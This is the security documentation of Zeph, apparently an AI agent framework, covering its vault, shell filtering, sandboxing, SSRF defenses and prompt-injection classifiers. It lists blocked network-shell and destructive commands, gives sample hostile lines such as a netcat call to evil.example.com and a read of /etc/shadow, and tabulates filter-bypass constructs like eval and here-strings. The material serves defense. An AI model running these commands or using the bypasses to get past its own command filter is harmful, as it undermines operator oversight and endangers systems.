
Security

Zeph implements defense-in-depth security for safe AI agent operations in production environments.

Age Vault

Zeph can store secrets in an age-encrypted vault file instead of environment variables. This is the recommended approach for production and shared environments.

Setup

zeph vault init                        # generate keypair + empty vault
zeph vault set ZEPH_CLAUDE_API_KEY sk-ant-...
zeph vault set ZEPH_TELEGRAM_TOKEN 123456:ABC...
zeph vault list                        # show stored keys
zeph vault get ZEPH_CLAUDE_API_KEY     # retrieve a value
zeph vault rm ZEPH_CLAUDE_API_KEY      # remove a key

Enable the vault backend in config:

[vault]
backend = "age"

The vault file path defaults to ~/.zeph/vault.age. The private key path defaults to ~/.zeph/key.txt.

Custom Secrets

Beyond built-in provider keys, you can store arbitrary secrets for skill authentication using the ZEPH_SECRET_ prefix:

zeph vault set ZEPH_SECRET_GITHUB_TOKEN ghp_yourtokenhere
zeph vault set ZEPH_SECRET_STRIPE_KEY sk_live_...

Skills declare which secrets they require via x-requires-secrets in their frontmatter. Skills with unsatisfied secrets are excluded from the prompt automatically — they will not be matched or executed until the secret is available.

When a skill with x-requires-secrets is active, its secrets are injected as environment variables into shell commands it runs. The prefix is stripped and the name is uppercased:

| Vault key | Env var injected |
|---|---|
| ZEPH_SECRET_GITHUB_TOKEN | GITHUB_TOKEN |
| ZEPH_SECRET_STRIPE_KEY | STRIPE_KEY |

Only the secrets declared by the currently active skill are injected — not all vault secrets.
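As a sketch (function name and shape are assumptions, not Zeph's actual code), the documented mapping rule can be expressed as:

```rust
// Hypothetical sketch of the documented rule: strip the ZEPH_SECRET_
// prefix and uppercase the remainder to obtain the env var name
// injected into the skill's shell commands.
const SECRET_PREFIX: &str = "ZEPH_SECRET_";

fn env_var_for_vault_key(vault_key: &str) -> Option<String> {
    vault_key
        .strip_prefix(SECRET_PREFIX)
        .map(|rest| rest.to_uppercase())
}

fn main() {
    assert_eq!(
        env_var_for_vault_key("ZEPH_SECRET_GITHUB_TOKEN").as_deref(),
        Some("GITHUB_TOKEN")
    );
    // Built-in provider keys are not injected into skill shells.
    assert_eq!(env_var_for_vault_key("ZEPH_CLAUDE_API_KEY"), None);
}
```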

See Add Custom Skills — Secret-Gated Skills for how to declare requirements in a skill.

Docker

Mount the vault and key files as read-only volumes:

volumes:
  - ~/.zeph/vault.age:/home/zeph/.zeph/vault.age:ro
  - ~/.zeph/key.txt:/home/zeph/.zeph/key.txt:ro

Shell Command Filtering

All shell commands from LLM responses pass through a security filter before execution. Detection uses a tokenizer-based pipeline: the input is split into tokens, wrapper commands (e.g., env, nohup, timeout) are unwrapped, and the result is matched against blocked patterns on word boundaries. This replaces the earlier substring-based approach, giving more accurate detection with fewer false positives. Commands matching blocked patterns are rejected with detailed error messages.

12 blocked patterns by default:

| Pattern | Risk category | Rationale |
|---|---|---|
| rm -rf /, rm -rf /* | Filesystem destruction | Prevents accidental system wipe |
| sudo, su | Privilege escalation | Blocks unauthorized root access |
| mkfs, fdisk | Filesystem operations | Prevents disk formatting |
| dd if=, dd of= | Low-level disk I/O | Blocks dangerous write operations |
| curl \| bash, wget \| sh | Arbitrary code execution | Prevents remote code injection |
| nc, ncat, netcat | Network backdoors | Blocks reverse shell attempts |
| shutdown, reboot, halt | System control | Prevents service disruption |

Configuration:

[tools.shell]
timeout = 30
blocked_commands = ["custom_pattern"]  # Additional patterns (additive to defaults)
allowed_paths = ["/home/user/workspace"]  # Restrict filesystem access
allow_network = true  # false blocks curl/wget/nc
confirm_patterns = ["rm ", "git push -f"]  # Destructive command patterns

Custom blocked patterns are additive — you cannot weaken default security. Matching is case-insensitive.
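A minimal sketch of the word-boundary check described above, assuming a simplified wrapper-stripping rule and a subset of the blocklist; Zeph's real pipeline is more thorough:

```rust
// Simplified sketch (not Zeph's actual tokenizer): split into
// whitespace tokens, skip leading wrappers (env, nohup, timeout)
// plus flags, KEY=VAL assignments, and numeric durations, then
// match the head token against the blocklist on word boundaries
// rather than as a substring.
const WRAPPERS: &[&str] = &["env", "nohup", "timeout"];
const BLOCKED: &[&str] = &["sudo", "su", "mkfs", "fdisk", "shutdown", "reboot", "halt"];

fn is_blocked(command: &str) -> bool {
    let mut tokens = command.split_whitespace().peekable();
    while let Some(tok) = tokens.peek() {
        if WRAPPERS.contains(tok)
            || tok.starts_with('-')
            || tok.contains('=')
            || tok.chars().all(|c| c.is_ascii_digit())
        {
            tokens.next();
        } else {
            break;
        }
    }
    match tokens.next() {
        // Matching is case-insensitive, per the config docs.
        Some(head) => BLOCKED.contains(&head.to_lowercase().as_str()),
        None => false,
    }
}

fn main() {
    assert!(is_blocked("timeout 30 sudo rm -rf /"));
    // Word-boundary matching avoids the substring false positive on "su".
    assert!(!is_blocked("sutra.sh --help"));
}
```

Note how `sutra.sh` passes while `su` alone is blocked; this is the false-positive class the tokenizer approach eliminates.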

Subshell Detection

The blocklist scanner detects blocked commands wrapped inside subshell constructs. The tokenizer extracts the command token from backtick substitution (`cmd`), $(cmd), <(cmd), and >(cmd) process substitution forms. A blocked command name within any of these constructs is rejected before the shell sees it.

For example, `sudo rm -rf /`, $(sudo rm -rf /), <(sudo cat /etc/shadow), and >(nc evil.example.com) are all blocked when sudo, rm -rf /, or nc appear in the blocklist.
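The substitution-extraction step might look like this simplified, ASCII-only sketch (not Zeph's actual tokenizer, which handles nesting and quoting):

```rust
// Pull command text out of substitution constructs so the blocklist
// can inspect it: `cmd`, $(cmd), <(cmd), and >(cmd). ASCII input is
// assumed; nested parentheses are not handled in this sketch.
fn inner_commands(input: &str) -> Vec<String> {
    let mut found = Vec::new();
    let mut i = 0;
    while i < input.len() {
        let rest = &input[i..];
        if let Some(open) = ["$(", "<(", ">("].iter().find(|p| rest.starts_with(**p)) {
            let body = &rest[open.len()..];
            if let Some(end) = body.find(')') {
                found.push(body[..end].trim().to_string());
                i += open.len() + end + 1;
                continue;
            }
        } else if rest.starts_with('`') {
            if let Some(end) = rest[1..].find('`') {
                found.push(rest[1..1 + end].trim().to_string());
                i += end + 2;
                continue;
            }
        }
        i += 1;
    }
    found
}

fn main() {
    // Each extracted inner command would then be run through the
    // same blocklist check as a top-level command.
    assert_eq!(inner_commands("echo $(sudo rm -rf /)"), vec!["sudo rm -rf /"]);
}
```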

Known Limitations

find_blocked_command operates on tokenized command text and cannot detect blocked commands embedded inside indirect execution constructs:

| Construct | Example | Why it bypasses |
|---|---|---|
| Here-strings | bash <<< 'sudo rm -rf /' | The payload string is opaque to the filter |
| eval / bash -c / sh -c | eval 'sudo rm -rf /' | The string argument is not parsed |
| Variable expansion | cmd=sudo; $cmd rm -rf / | Variables are not resolved during tokenization |

Mitigation: The default confirm_patterns in ShellConfig include <(, >(, <<<, eval , $(, and ` — commands containing these constructs trigger a confirmation prompt before execution. For high-security deployments, complement this filter with OS-level sandboxing (Linux namespaces, seccomp, or similar).

Shell Sandbox

Commands are validated against a configurable filesystem allowlist before execution:

  • allowed_paths = [] (default) restricts access to the working directory only
  • Paths are canonicalized to prevent traversal attacks (../../etc/passwd)
  • Relative paths containing .. segments are rejected before canonicalization as an additional defense layer
  • allow_network = false blocks network tools (curl, wget, nc, ncat, netcat)

Destructive Command Confirmation

Commands matching confirm_patterns trigger an interactive confirmation before execution:

  • CLI: y/N prompt on stdin
  • Telegram: inline keyboard with Confirm/Cancel buttons
  • Default patterns: rm, git push -f, git push --force, drop table, drop database, truncate, $(, `, <(, >(, <<<, eval
  • Configurable via tools.shell.confirm_patterns in TOML

File Executor Sandbox

FileExecutor enforces the same allowed_paths sandbox as the shell executor for all file operations (read, write, edit, glob, grep).

Path validation:

  • All paths are resolved to absolute form and canonicalized before access
  • Non-existing paths (e.g., for write) use ancestor-walk canonicalization: the resolver walks up the path tree to the nearest existing ancestor, canonicalizes it, then re-appends the remaining segments. This prevents symlink and .. traversal on paths that do not yet exist on disk
  • If the resolved path does not fall under any entry in allowed_paths, the operation is rejected with a SandboxViolation error
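The ancestor-walk can be sketched as follows; the function name and exact behavior are assumptions based on the description above:

```rust
use std::io;
use std::path::{Component, Path, PathBuf};

// Sketch of ancestor-walk canonicalization for paths that may not
// exist yet: reject `..` segments up front, climb to the nearest
// existing ancestor, canonicalize it (resolving symlinks), then
// re-append the not-yet-existing tail segments.
fn canonicalize_allowing_nonexistent(path: &Path) -> io::Result<PathBuf> {
    if path.components().any(|c| matches!(c, Component::ParentDir)) {
        return Err(io::Error::new(io::ErrorKind::InvalidInput, "`..` segment rejected"));
    }
    let mut existing = path;
    let mut tail = Vec::new();
    loop {
        match existing.canonicalize() {
            Ok(mut base) => {
                // Re-append the missing segments in original order.
                for seg in tail.iter().rev() {
                    base.push(seg);
                }
                return Ok(base);
            }
            Err(_) => match existing.parent() {
                Some(parent) => {
                    if let Some(name) = existing.file_name() {
                        tail.push(name.to_owned());
                    }
                    existing = parent;
                }
                None => return existing.canonicalize(),
            },
        }
    }
}

fn main() {
    let p = std::env::temp_dir().join("zeph-sketch-missing").join("out.txt");
    let resolved = canonicalize_allowing_nonexistent(&p).unwrap();
    assert!(resolved.ends_with("zeph-sketch-missing/out.txt"));
}
```

The resolved path would then be checked against allowed_paths like any other canonical path.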

Glob and grep enforcement:

  • glob results are post-filtered: matched paths outside the sandbox are silently excluded
  • grep validates the search root directory before scanning begins

Configuration is shared with the shell sandbox:

[tools.shell]
allowed_paths = ["/home/user/workspace"]  # Empty = cwd only

File Read Sandbox

The [tools.file] section exposes per-path glob filters that are applied independently of the allowed_paths filesystem sandbox. They operate on the canonicalized absolute path, making them symlink-safe.

Evaluation order: deny first, then allow.

| Field | Purpose |
|---|---|
| deny_read | Glob patterns that are always blocked. Evaluated before allow_read. |
| allow_read | Glob patterns that are permitted even when a deny_read rule would match. An empty list means "allow all paths that are not denied." |

If a path matches deny_read and does not match allow_read, the read is rejected with a SandboxViolation error. If deny_read is empty, no paths are blocked (the allow list has no effect).

Example — block secrets, allow a single public file:

[tools.file]
deny_read  = ["**/.env", "**/secrets/**", "**/*.key"]
allow_read = ["/home/user/projects/**"]

In this configuration, any .env file under any directory is denied. Paths under /home/user/projects/ are permitted even if they would otherwise match a deny pattern.

Paths are canonicalized before matching, so symlinks that resolve outside the allow list or into a denied path are correctly blocked.
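The deny-then-allow precedence can be illustrated with a toy matcher. Real Zeph uses full glob patterns; toy_match below supports only a few forms, just enough to show the evaluation order:

```rust
// Toy glob matcher: supports "**/name" (file anywhere), "**/dir/**"
// (anything under a dir of that name), and "/prefix/**". Not a real
// glob engine; for illustration of precedence only.
fn toy_match(pattern: &str, path: &str) -> bool {
    match pattern.strip_prefix("**/") {
        Some(suffix) if suffix.ends_with("/**") => {
            let dir = &suffix[..suffix.len() - 3];
            path.split('/').any(|seg| seg == dir)
        }
        Some(suffix) => path.ends_with(&format!("/{suffix}")),
        None if pattern.ends_with("/**") => path.starts_with(&pattern[..pattern.len() - 2]),
        None => path == pattern,
    }
}

fn read_permitted(path: &str, deny: &[&str], allow: &[&str]) -> bool {
    let denied = deny.iter().any(|p| toy_match(p, path));
    // Deny first, then allow: an allow rule overrides a deny match.
    // Empty deny list blocks nothing, matching the documented semantics.
    !denied || allow.iter().any(|p| toy_match(p, path))
}

fn main() {
    let deny = ["**/.env", "**/secrets/**"];
    let allow = ["/home/user/projects/**"];
    assert!(!read_permitted("/home/user/app/.env", &deny, &allow));
    // Allow overrides deny under /home/user/projects/.
    assert!(read_permitted("/home/user/projects/site/.env", &deny, &allow));
}
```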

MCP Tool Name Collision

Each MCP tool is identified internally by a sanitized_id derived from its qualified_name (server_id:tool_name). The colon and any characters outside [a-zA-Z0-9_-] are replaced with _. This means two different (server_id, tool_name) pairs can produce the same sanitized_id — for example, a.b:c and a:b_c both sanitize to a_b_c.
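The sanitization rule and collision check can be sketched as follows (assumed shape, not Zeph's exact code):

```rust
use std::collections::HashMap;

// Documented rule: any character outside [a-zA-Z0-9_-], including
// the colon separator, becomes '_'. Collisions follow directly.
fn sanitize_id(qualified_name: &str) -> String {
    qualified_name
        .chars()
        .map(|c| if c.is_ascii_alphanumeric() || c == '_' || c == '-' { c } else { '_' })
        .collect()
}

fn detect_collisions<'a>(qualified_names: &[&'a str]) -> Vec<(&'a str, &'a str)> {
    let mut seen: HashMap<String, &'a str> = HashMap::new();
    let mut collisions = Vec::new();
    for &name in qualified_names {
        let id = sanitize_id(name);
        match seen.get(&id) {
            // First-registered tool wins dispatch; later ones are shadowed.
            Some(&first) => collisions.push((first, name)),
            None => {
                seen.insert(id, name);
            }
        }
    }
    collisions
}

fn main() {
    assert_eq!(sanitize_id("a.b:c"), "a_b_c");
    assert_eq!(sanitize_id("a:b_c"), "a_b_c");
    assert_eq!(detect_collisions(&["a.b:c", "a:b_c"]), vec![("a.b:c", "a:b_c")]);
}
```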

Detection: Zeph runs detect_collisions against the full tool list whenever servers are loaded or a new server is added. Every collision pair is reported at WARN level:

WARN zeph_mcp: MCP tool sanitized_id collision: 'a_b_c' shadows 'a:b_c' — executor will always dispatch to the first-registered tool

Resolution: The first-registered tool wins dispatch. Subsequent tools with the same sanitized_id are unreachable — the executor cannot route calls to them.

Security implication: A malicious or misconfigured MCP server could register a tool whose sanitized_id collides with a trusted server’s tool, causing the trusted tool to become unreachable. Zeph does not silently allow this: the collision is logged with both the qualified_name and trust level of each conflicting tool so the operator can identify and remove the offending server.

Mitigation: Choose server IDs that are unique and do not produce overlapping sanitized names. If two legitimate servers expose tools with colliding names, rename one server’s ID in the Zeph config:

[[mcp.servers]]
id = "github-primary"   # unique prefix prevents sanitized_id collision
command = "npx"
args = ["-y", "@modelcontextprotocol/server-github"]

Autonomy Levels

The security.autonomy_level setting controls the agent’s tool access scope:

| Level | Tools available | Confirmations |
|---|---|---|
| readonly | read, find_path, list_directory, grep, web_scrape, fetch | N/A (write tools hidden) |
| supervised | All tools per permission policy | Yes, for destructive patterns |
| full | All tools | No confirmations |

Default is supervised. In readonly mode, write-capable tools are excluded from the LLM system prompt and rejected at execution time (defense-in-depth).

[security]
autonomy_level = "supervised"  # readonly, supervised, full

Permission Policy

The [tools.permissions] config section provides fine-grained, pattern-based access control for each tool. Rules are evaluated in order (first match wins) using case-insensitive glob patterns against the tool input. See Tool System — Permissions for configuration details.

Key security properties:

  • Tools with all-deny rules are excluded from the LLM system prompt, preventing the model from attempting to use them
  • Legacy blocked_commands and confirm_patterns are auto-migrated to equivalent permission rules when [tools.permissions] is absent
  • Default action when no rule matches is Ask (confirmation required)

Audit Logging

Structured JSON audit log for all tool executions:

[tools.audit]
enabled = true
destination = ".zeph/data/audit.jsonl"  # or "stdout"

Each entry includes timestamp, tool name, command, result (success/blocked/error/timeout), and duration in milliseconds.

Secret Redaction

LLM responses are scanned for secret patterns using compiled regexes before display:

  • Detected prefixes: sk-, AKIA, ghp_, gho_, xoxb-, xoxp-, sk_live_, sk_test_, -----BEGIN, AIza (Google API), glpat- (GitLab), hf_ (HuggingFace), npm_ (npm), dckr_pat_ (Docker)
  • Regex-based matching replaces detected secrets with [REDACTED], preserving original whitespace formatting
  • Enabled by default (security.redact_secrets = true), applied to both streaming and non-streaming responses
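A simplified, prefix-based sketch of the redaction step (the real implementation uses compiled regexes and covers the full prefix list above):

```rust
// Sketch: any space-delimited token starting with a known secret
// prefix is replaced by [REDACTED]. Splitting on ' ' (rather than
// split_whitespace) keeps runs of spaces intact, approximating the
// "preserve original whitespace" behavior for single-line text.
const SECRET_PREFIXES: &[&str] = &["sk-", "AKIA", "ghp_", "xoxb-", "glpat-", "hf_"];

fn redact(text: &str) -> String {
    let mut out = String::with_capacity(text.len());
    for (i, chunk) in text.split(' ').enumerate() {
        if i > 0 {
            out.push(' ');
        }
        if SECRET_PREFIXES.iter().any(|p| chunk.starts_with(p)) {
            out.push_str("[REDACTED]");
        } else {
            out.push_str(chunk);
        }
    }
    out
}

fn main() {
    assert_eq!(redact("token: ghp_abc123 ok"), "token: [REDACTED] ok");
}
```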

Credential Scrubbing in Context

In addition to output redaction, Zeph scrubs credential patterns from conversation history before injecting it into the LLM context window. The scrub_content() function in the context builder detects the same secret prefixes and replaces them with [REDACTED]. This prevents credentials that appeared in past messages from leaking into future LLM prompts.

[memory]
redact_credentials = true  # default: true

This is independent of security.redact_secrets — output redaction sanitizes LLM responses, while credential scrubbing sanitizes LLM inputs from stored history.

Config Validation

Config::validate() enforces upper bounds at startup to catch configuration errors early:

  • memory.history_limit <= 10,000
  • memory.context_budget_tokens <= 1,000,000 (when non-zero)
  • agent.max_tool_iterations <= 100
  • a2a.rate_limit > 0
  • gateway.rate_limit > 0
  • gateway.max_body_size <= 10,485,760 (10 MiB)

The agent exits with an error message if any bound is violated.
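A sketch of the bound checks (field names follow the bullets above; the struct and error type are simplified, and only a subset of the bounds is shown):

```rust
// Simplified stand-in for Config::validate(): reject out-of-range
// values at startup so misconfiguration fails fast.
struct Limits {
    history_limit: u32,
    context_budget_tokens: u64,
    max_tool_iterations: u32,
    gateway_max_body_size: u64,
}

fn validate(cfg: &Limits) -> Result<(), String> {
    if cfg.history_limit > 10_000 {
        return Err("memory.history_limit must be <= 10000".into());
    }
    // Zero means "unlimited/disabled" here, so only non-zero is bounded.
    if cfg.context_budget_tokens != 0 && cfg.context_budget_tokens > 1_000_000 {
        return Err("memory.context_budget_tokens must be <= 1000000".into());
    }
    if cfg.max_tool_iterations > 100 {
        return Err("agent.max_tool_iterations must be <= 100".into());
    }
    if cfg.gateway_max_body_size > 10_485_760 {
        return Err("gateway.max_body_size must be <= 10 MiB".into());
    }
    Ok(())
}

fn main() {
    let ok = Limits {
        history_limit: 500,
        context_budget_tokens: 0,
        max_tool_iterations: 10,
        gateway_max_body_size: 1024,
    };
    assert!(validate(&ok).is_ok());
}
```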

Timeout Policies

Configurable per-operation timeouts prevent hung connections:

[timeouts]
llm_seconds = 120       # LLM chat completion
embedding_seconds = 30  # Embedding generation
a2a_seconds = 30        # A2A remote calls

A2A and Gateway Bearer Authentication

Both the A2A server and the HTTP gateway use bearer token authentication backed by constant-time comparison (subtle::ConstantTimeEq) to prevent timing side-channel attacks.
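For illustration, the constant-time property can be hand-rolled as below; in practice, use the subtle crate as Zeph does:

```rust
// Principle behind subtle::ConstantTimeEq: XOR-accumulate every
// byte so the comparison takes the same time regardless of where
// the first mismatch occurs, defeating timing side channels.
// Prefer the audited `subtle` crate in production code.
fn constant_time_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    let mut diff = 0u8;
    for (x, y) in a.iter().zip(b.iter()) {
        diff |= x ^ y;
    }
    diff == 0
}

fn main() {
    assert!(constant_time_eq(b"secret", b"secret"));
    assert!(!constant_time_eq(b"secret", b"secreT"));
}
```

A naive `==` on strings can short-circuit at the first differing byte, letting an attacker measure how many leading bytes of the token they have guessed correctly.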

A2A Server

Configure via config.toml or environment variable:

[a2a]
auth_token = "secret"  # or use vault: ZEPH_A2A_AUTH_TOKEN

The /.well-known/agent.json endpoint is intentionally public and bypasses auth to allow agent discovery.

If auth_token is None at startup, the server logs a WARN-level message:

WARN zeph_a2a: A2A server started without auth_token — endpoint is unauthenticated

HTTP Gateway

Configure via config.toml or environment variable:

[gateway]
auth_token = "secret"  # or use vault: ZEPH_GATEWAY_TOKEN

The ACP HTTP GET /health endpoint is intentionally public and bypasses auth so IDEs can poll server readiness before authenticating or opening a session.

If auth_token is None at startup, the server logs a WARN-level message:

WARN zeph_gateway: Gateway started without auth_token — endpoint is unauthenticated

Recommendation: Always set auth_token when binding to a non-loopback interface. Use the Age Vault to store the token rather than embedding it in plain text in config.toml.

SSRF Protection for Web Scraping

WebScrapeExecutor defends against Server-Side Request Forgery (SSRF) at every stage of a request, including multi-hop redirect chains.

URL Validation

Before any network connection is made, validate_url checks:

  • HTTPS only: HTTP, file://, javascript:, data:, and all other schemes are rejected with ToolError::Blocked.
  • Private hostnames: The following hostname patterns are blocked regardless of DNS resolution:
    • localhost and *.localhost subdomains
    • *.internal TLD (cloud/Kubernetes internal DNS)
    • *.local TLD (mDNS/Bonjour)
    • IPv4 literals in RFC 1918 ranges (10.x.x.x, 172.16–31.x.x, 192.168.x.x)
    • IPv4 link-local (169.254.x.x), loopback (127.x.x.x), unspecified (0.0.0.0), and broadcast (255.255.255.255)
    • IPv6 loopback (::1), link-local (fe80::/10), unique-local (fc00::/7), and unspecified (::)
    • IPv4-mapped IPv6 addresses (::ffff:x.x.x.x) — the inner IPv4 is checked against all private ranges above
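These rules map closely onto std::net's address classification. A sketch (bit-mask checks stand in for IPv6 std methods that are not stable on all toolchains):

```rust
use std::net::{IpAddr, Ipv4Addr};

// Sketch of the private-range rules listed above.
fn is_private_ipv4(ip: Ipv4Addr) -> bool {
    ip.is_private()        // RFC 1918: 10/8, 172.16/12, 192.168/16
        || ip.is_loopback()    // 127.0.0.0/8
        || ip.is_link_local()  // 169.254.0.0/16
        || ip.is_unspecified() // 0.0.0.0
        || ip.is_broadcast()   // 255.255.255.255
}

fn is_private_ip(ip: IpAddr) -> bool {
    match ip {
        IpAddr::V4(v4) => is_private_ipv4(v4),
        IpAddr::V6(v6) => {
            // IPv4-mapped (::ffff:x.x.x.x): check the inner IPv4.
            if let Some(v4) = v6.to_ipv4_mapped() {
                return is_private_ipv4(v4);
            }
            let seg0 = v6.segments()[0];
            v6.is_loopback()                  // ::1
                || v6.is_unspecified()        // ::
                || (seg0 & 0xffc0) == 0xfe80  // link-local fe80::/10
                || (seg0 & 0xfe00) == 0xfc00  // unique-local fc00::/7
        }
    }
}

fn main() {
    assert!(is_private_ip("169.254.169.254".parse().unwrap()));
    assert!(!is_private_ip("93.184.216.34".parse().unwrap()));
}
```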

DNS Rebinding Prevention

After URL validation, resolve_and_validate performs a DNS lookup and checks every returned IP address against the same private-range rules. The validated socket addresses are then pinned to the reqwest client via resolve_to_addrs, eliminating the TOCTOU window between DNS validation and the actual TCP connection.

If DNS resolves to a private IP, the request is rejected with:

ToolError::Blocked { command: "SSRF protection: private IP <ip> for host <host>" }

Redirect Chain Defense

WebScrapeExecutor disables reqwest’s automatic redirect following (redirect::Policy::none()). Redirects are followed manually, up to a limit of 3 hops. For every redirect:

  1. The Location header value is extracted.
  2. Relative URLs are resolved against the current request URL.
  3. validate_url runs on the resolved target — blocking private hostnames and non-HTTPS schemes.
  4. resolve_and_validate runs on the target — blocking DNS-based rebinding.
  5. A new reqwest client is built, pinned to the validated addresses for the next hop.

This prevents the classic “open redirect to internal service” SSRF bypass: even if the initial URL passes validation, a redirect to https://169.254.169.254/ (AWS metadata endpoint) or https://10.0.0.1/ is blocked before the connection is made.

If more than 3 redirects occur, the request fails with ToolError::Execution("too many redirects").

A2A Network Security

  • TLS enforcement: a2a.require_tls = true rejects HTTP endpoints (HTTPS only)
  • SSRF protection: a2a.ssrf_protection = true blocks private IP ranges (RFC 1918, loopback, link-local) via DNS resolution
  • Payload limits: a2a.max_body_size caps request body (default: 1 MiB)

Safe execution model:

  • Commands parsed for blocked patterns, then sandbox-validated, then confirmation-checked
  • Timeout enforcement (default: 30s, configurable)
  • Full errors logged to system; user-facing messages pass through sanitize_paths() which replaces absolute filesystem paths (/home/, /Users/, /root/, /tmp/, /var/) with [PATH] to prevent information disclosure
  • Audit trail for all tool executions (when enabled)

Container Security

| Security layer | Implementation | Status |
|---|---|---|
| Base image | Oracle Linux 9 Slim | Production-hardened |
| Vulnerability scanning | Trivy in CI/CD | 0 HIGH/CRITICAL CVEs |
| User privileges | Non-root zeph user (UID 1000) | Enforced |
| Attack surface | Minimal package installation | Distroless-style |

Continuous security:

  • Every release scanned with Trivy before publishing
  • Automated Dependabot PRs for dependency updates
  • cargo-deny checks in CI for license/vulnerability compliance

Secret Memory Hygiene

Zeph uses the zeroize crate to ensure that secret material is erased from process memory as soon as it is no longer needed.

Secret type:

// Internal representation — wraps Zeroizing<String> instead of plain String
Secret(Zeroizing<String>)

Zeroizing<T> implements Drop to overwrite heap memory with zeros before deallocation, preventing secrets from lingering in freed pages.

AgeVaultProvider:

All decrypted values in the in-memory secrets map are stored as BTreeMap<String, Zeroizing<String>>. Using BTreeMap instead of HashMap ensures that secrets are serialized in deterministic key order when vault.save() re-encrypts the vault. This makes repeated save operations produce consistent JSON output, which is important for diffing and auditing encrypted vault changes. Key-file content and intermediate decrypt buffers are also wrapped in Zeroizing so they are cleared when the local binding is dropped.

Clone intentionally removed:

Secret no longer derives Clone. This is a deliberate trade-off: preventing accidental cloning reduces the number of live copies of a secret value in memory at any given time.

If you need to pass a secret to a function, accept &Secret or extract the inner &str directly rather than cloning.

Indirect Prompt Injection (IPI) Defense

Zeph includes a multi-layer defense against indirect prompt injection — malicious instructions embedded in tool outputs, web pages, or MCP server responses that attempt to hijack the agent’s behavior.

Detection Pipeline

Three classifiers operate in sequence on every piece of external content before it enters the LLM context:

| Classifier | Method | Purpose |
|---|---|---|
| DeBERTa soft-signal | Local NER model (feature-gated) | Fast token-level detection of injection patterns |
| AlignSentinel (3-class) | Lightweight LLM classifier | Classifies content as safe, suspicious, or malicious |
| TurnCausalAnalyzer | Heuristic + LLM | Detects whether a tool output is attempting to influence subsequent agent actions |

When any classifier flags content as malicious, the content is quarantined before reaching the LLM. Suspicious content is passed through with a warning annotation. The DeBERTa classifier requires the candle feature; without it, detection falls back to regex patterns and the LLM classifiers.

Cross-Tool Injection Correlation

Zeph tracks injection signals across consecutive tool calls within a single turn. If multiple tool outputs in the same turn contain injection indicators, the correlation engine escalates the severity — even if individual signals are below the blocking threshold. This defends against split-payload attacks where malicious instructions are distributed across multiple tool responses.

MCP/A2A Security Hardening

  • Tool collision detection: when multiple MCP servers expose tools with the same name, Zeph detects the collision and either prefixes with the server ID or blocks the duplicate
  • SMCP lifecycle: Secure MCP session lifecycle management with token-based authentication for dynamic server connections
  • IBCT tokens: Identity-Bound Capability Tokens for A2A agent authentication
  • MCP to ACP confused-deputy enforcement: prevents MCP tool results from being used to bypass ACP permission boundaries

Credential Environment Scrubbing

Shell commands executed by the agent run in a scrubbed environment. Variables matching credential patterns (API keys, tokens, passwords) are removed from the subprocess environment before execution. This prevents skills or tool calls from exfiltrating secrets via environment variable inspection.
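A sketch of the scrubbing step; the marker list is an assumption for illustration, not Zeph's actual pattern set:

```rust
// Drop any variable whose name suggests credential material before
// the subprocess environment is assembled.
fn is_credential_var(name: &str) -> bool {
    const MARKERS: &[&str] = &["KEY", "TOKEN", "SECRET", "PASSWORD", "CREDENTIAL"];
    let upper = name.to_uppercase();
    MARKERS.iter().any(|m| upper.contains(m))
}

fn scrubbed_env(vars: &[(&str, &str)]) -> Vec<(String, String)> {
    vars.iter()
        .filter(|(name, _)| !is_credential_var(name))
        .map(|(n, v)| (n.to_string(), v.to_string()))
        .collect()
}

fn main() {
    let env = [("PATH", "/usr/bin"), ("GITHUB_TOKEN", "ghp_x")];
    let kept = scrubbed_env(&env);
    assert_eq!(kept.len(), 1);
    assert_eq!(kept[0].0, "PATH");
}
```

In practice the filtered set would be applied with something like `Command::env_clear()` followed by `.envs(...)`, so the child process never sees the removed variables.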

PII Protection

A configurable NER-based PII detection system can identify and redact personally identifiable information in tool outputs before they enter the LLM context. A circuit breaker protects against runaway cost from paginated reads that trigger repeated PII scans.

Code Security

Rust-native memory safety guarantees:

  • Workspace-level unsafe ban: unsafe_code = "deny" is set in [workspace.lints.rust] in the root Cargo.toml, propagating the restriction to every crate in the workspace automatically. The single audited exception is an #[allow(unsafe_code)]-annotated block behind the candle feature flag for memory-mapped safetensors loading.
  • No panic in production: unwrap() and expect() linted via clippy
  • Reduced attack surface: Unused database backends (MySQL) and transitive dependencies (RSA) are excluded from the build
  • Secure dependencies: All crates audited with cargo-deny
  • MSRV policy: Rust 1.88+ (Edition 2024) for latest security patches

Reporting Vulnerabilities

Do not open a public issue. Use GitHub Security Advisories to submit a private report.

Include: description, steps to reproduce, potential impact, suggested fix. Expect an initial response within 72 hours.